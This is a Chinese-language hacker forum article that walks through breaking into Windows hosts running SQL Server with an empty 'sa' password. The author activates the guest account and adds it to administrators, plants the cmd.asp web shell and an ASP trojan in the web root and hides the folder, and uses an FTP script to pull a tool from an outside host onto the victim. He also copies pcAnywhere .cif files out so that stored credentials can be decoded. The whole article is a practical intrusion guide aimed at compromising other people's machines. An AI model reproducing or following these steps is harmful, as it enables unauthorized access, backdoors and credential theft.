来源:黑白网络
前言,这是我两天入侵两台sa空密码主机的真实总结:
1.如何找到sa空密码肉鸡?自己用流光扫吧。
2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。
3.工具:supersqlexec.exe、cmd.asp(
www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘
4.用supersqlexec联接成功。在命令行中输入:
net user guest /active:yes
(>指肉鸡显示下同)The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。
5.心中暗喜,下一步启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。
6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失败。服务器没开ipc$?
7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思 不得其解。我后来换wn2000的cmd下net use \\ip\ipc$ "123456" /user:"guest"也不能联接成功。
8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
9.回到sqlexe命令行中net use x: \\本机ip\f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器显 示命令成功完成。
10.sqlexe命令行中运行set得知其主页位置在d:\inetpub\wwwroot。不错,服务器支持asp.你如果看不懂这个 命令,也可以根据其主页上某个图像文件名,然后dir *.jpg/s查找其主页位置。
11.sqlexe命令行中copy x:\cmd.asp d:\inetpub\wwwroot
12.回到ie中http://服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。md d:\inetpub\wwwroot\aspmm
13.sqlexec命令行中copy x:\海阳顶端网木马\*.* d:\inetpub\wwwroot\aspmm\.再将目录隐藏attrib +h d:\inetpub\wwwroot\aspmm
14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。试一下ftp上传。先将自己的文件lcx.exe上传 到个人主页空间。
15.在自己本机上建立up.txt内容如下:
open ftp1.go.163.com(我用得是网易ftp)
username(你的上传用户名)
password(密码)
get lcx.exe(你要上传到肉鸡的文件名)
bye(退出ftp)
通过映射copy到肉鸡的c:\up.txt
16.sqlexec命令行中ftp -s:c:\up.txt等一会你就看到lcx.exe已经在肉鸡在\winnt\system32\下了。
17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气不好 ,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。
18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?
19.通过一天的dos8.3规则的补习才知应是这样 :copyc:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\inetpub\wwwroot\.然后通过 ie下载。
20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可以 激活不知什么原因,望高手指点。
ps:很老的文章了。赫赫。
